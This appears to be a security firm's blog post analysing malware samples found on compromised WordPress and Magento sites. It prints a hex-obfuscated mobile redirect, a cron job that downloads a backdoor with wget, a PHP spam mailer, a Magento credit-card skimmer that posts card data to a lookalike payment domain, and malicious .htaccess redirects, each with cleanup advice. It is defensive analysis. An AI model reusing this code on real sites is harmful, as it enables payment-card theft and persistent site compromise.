Author: Krasimir Konov

We recently found a website that was redirecting mobile users to a third-party site called chickenkiller&nbsp.com, after further investigation we found that the malware was actually injected into the database, the code was hex encoded to prevent users from being able to search for the domain in the malicious code.

The malware was stored in: wp_options -> FieldName: option_value -> ID: 3284 (this value may not be the same on every infection)

Here\'s a snippet of the code you may find on infected sites:

a:1:{s:7:"padding";s:1888:"</script><script>var _0x93d9=["\x77\x70\x6B\x6A","\x63\x6F\x6F\x6B\x69\x65","\x3D"
,"\x3B\x20\x70\x61\x74\x68\x3D\x2F","\x3B","\x73\x70\x6C\x69\x74","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67"
,"\x63\x68\x61\x72\x41\x74","\x20","\x69\x6E\x64\x65\x78\x4F\x66"];
if(!readCookie(_0x93d9[0])){createCookie(_0x93d9[0],_0x93d9[1],1);if(/iPhone|iPad|iPod/i[_0x93d9[1]]
(navigator[_0x93d9[2]])){window[_0x93d9[3]]=_0x93d9[4]}else {if(/Android/i[_0x93d9[1]](navigator[_0x93d9[2]])){window[_0x93d9[3]]=_0x93d9[5]}};};

This malware\'s obfuscation technique is not too complex, when deobfuscated, the most interesting part is the conditional redirect, which tells us that the malware had two different final URLs depending on which flavor of the mobile OS:

    if (!readCookie("wpkj") {
        createCookie("wpkj", "test", 1);
        if (/iPhone|iPad|iPod/i ["test"](navigator["userAgent"])) {
            window[location] = "http:// load-me.chickenkiller .com/5972"
        } else {
            if (/Android/i ["wpkj"](navigator["test"])) {
                window[location] = "http:// load-me.chickenkiller .com/596F"
            }
        };
    };

What we learn form this sample is that checking only your site\'s files for anomalies is not enough. Once an attack happens, the attacker can add malicious content to your site\'s database. It could be a backdoor or a malicious redirect for mobile phones.

You may remove malware from files and a database, close all security holes, change all passwords, but your site still gets reinfected regularly. It may be because you forgot to clean your crontab.

Here's an example of a malicious cron job that creates a backdoor file in the /wp-includes/Text/Diff/Engine directory every other day:

DOWNLOAD_URL="hxxp://cpanel .jawebsolutions .com/u/w.gz"LOCAL_FILE_PATH="/home/username/public_html/wp-includes/Text/Diff/Engine/i18n.php"1 3 */2 * * rm -f /var/tmp/w.gz ; wget -q -O /var/tmp/w.gz $DOWNLOAD_URL && gunzip -c /var/tmp/w.gz > $LOCAL_FILE_PATH && touch -c -t 201007151834 $LOCAL_FILE_PATH && rm -f /var/tmp/w.gz

So don't forget to check cron jobs in your hosting control panel or use the crontab -l command if you have SSH access.

Here is a mailer script we recently found that appears to be designed to send spam emails.

These kind of scripts are pretty common, there are multiple variations but in most cases they are only designed to send spam. Accessing the file directly without passing a specific variable would cause it to just display a blank page which is used by spammers to hide the functionality of the script.

if ($_GET ['ch']) {
    echo "OK";
    exit ();
}

if($_POST['to'])
{
    $to = $_POST ['to'];
    $subject = stripslashes ( $_POST ['subj'] );
    $message = stripslashes ( $_POST ['mes'] );
    $headers = stripslashes ( $_POST ['headers'] );

    if (mail ( $to, $subject, $message, $headers )) {
        echo "Message sent successfully";
    } else {
        echo "An error occured";
    }
}

if (! $_POST['to'] && ! $_GET ['ch'] && count($_GET) > 0) {
    $arr = array (
        1 => 'a',
            2 => 'b',
            3 => 'c',
            4 => 'd',
            5 => 'e',
            6 => 'f',
            7 => 'g',
            8 => 'h',
            9 => 'i',
            10 => 'j',
            11 => 'k',
            12 => 'l',
            13 => 'm',
            14 => 'n',
            15 => 'o',
            16 => 'p',
            17 => 'q',
            18 => 'r',
            19 => 's',
            20 => 't',
            21 => 'u',
            22 => 'v',
            23 => 'w',
            24 => 'x',
            25 => 'y',
            26 => 'z',
            27 => '.',
            28 => '1',
            29 => '2',
            30 => '3',
            31 => '4',
            32 => '5',
            33 => '6',
            34 => '7',
            35 => '8',
            36 => '9',
            37 => '0'
    );

    $var = key ( $_GET );

    $var_arr = explode ( "-", $var );

    foreach ( $var_arr as $value ) {
        preg_match_all ( "~\d+~", $value, $matches );

        $value = implode ( "", $matches [0] );

        if ($value > sizeof ( $arr )) {
            for($i = $value; $i > sizeof ( $arr ); $i = $i - sizeof ( $arr )) {
                $value = $i;
            }

            $value -= sizeof ( $arr );
        }

        $string [.]= $arr [$value];
    }

    $link = $string [.] $_GET [$var];

    header (  "Location: http://{$link}" );

If you see it on your site, you are likely compromised.

We recently found another malicious script used to steal credit cards that appears to be injected into compromised websites running Magento, it appears to be sending the information to payment.authorize.ga which is a recently registered domain that mimics the Authorize.net payment gateway

The malware was found in file: ./app/code/core/Mage/Payment/Model/Method/Cc.php

$object = new Mage_Checkout_Block_Onepage_Billing;
        $address1 = $object->getQuote()->getBillingAddress();
        $data1 = $address1->getFirstname();
        $data2 = $address1->getLastname();
        $data3 = $address1->getStreet(1);
        $data5 = $address1->getCity();
        $data6 = $address1->getRegion();
        $data7 = $address1->getPostcode();
        $data8 = $address1->getCountry();
        $data9 = $address1->getTelephone();
        $data10 = $info->getCcNumber();
        $expyear = substr($info->getCcExpYear(), -2);
        $expmonth = $info->getCcExpMonth();
        if (strlen($expmonth) == 1) {
           $expmonth = '0'.$expmonth;
        };
        $data11 = $expmonth;
        $data12 = $expyear;
        $data13 = $info->getCcCid();
        $data15 = "infectedwebsite.com";
        $data16 = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
     $ctx2 = stream_context_create(array(
        'http' => array(
            'timeout' => 3
            )
        )
    );
        $tesco = "$data10|$data13|$data11$data12|$data1 $data2|$data3|$data5|$data6|$data7|$data8|$data16|$data9|$data15";
        $ordser = @file_get_contents("http://payment.authorize.ga/uk.html?speciality=$tesco", -1, $ctx2);

We regularly detect malware that targets Magento payment modules:

• Phishing 2.0 – Credit Card Redirection on Compromised Sites
• Impacts of a Hack on a Magento Ecommerce Website
• Magento Platform Targeted By Credit Card Scrapers

In this case, the entire code from the $object all the way to the last line ending with $ctx2); should be removed from the Cc.php file in order to stop the credit card details from being sent to the remote website.

Other files could also contain this malicious code or even different code that will re-add the injection back in the site even after the above is removed, so just contact us if you have any questions and we will be happy to inspect the website.

We are finding many sites infected with malicious redirects inside the .htaccess file, to secondtds.mooo[.]com/go.php?sid=3. That domain is a TDS (traffic controller) which redirects visitors to another website pushing your browser to download this malware: https://www.virustotal.com/en/file/0b6eab15961f92da95a0a4b0d55fee8a8bd0eb39fec1027aa43575802d7a199e/analysis/1441223870/

The redirect chain is:

secondtds.mooo[.]com
downserver.ignorelist[.]com
pastdownload[.]com
stds1new.computersoftwarelive[.]com
download.pastdownload[.]com
files.september-master-3[.]xyz

Here is the .htaccess content:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} go.mail.* [OR]
RewriteCond %{HTTP_REFERER}  .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER}  .*bing.* [OR]
RewriteCond %{HTTP_REFERER}  .*goto.* [OR]
RewriteCond %{HTTP_REFERER}  .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER}  .*nigma.* [OR]
RewriteCond %{HTTP_REFERER}  .*mamma.* [OR]
..
RewriteCond %{HTTP_REFERER}  .*aport.* [OR]
RewriteCond %{HTTP_REFERER}  .*search.* [OR]
RewriteCond %{HTTP_REFERER}  .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER}  .*dogpile.*
RewriteRule ^(.*)$ http://secondtds[.]mooo.com[/]go.php?sid=2 [R=301,L]

The attack is quite buggy and doesn't check whether a site is already infected, thus multiple identical redirect rules in the same .htaccess file.

If you find this code, remove it right away!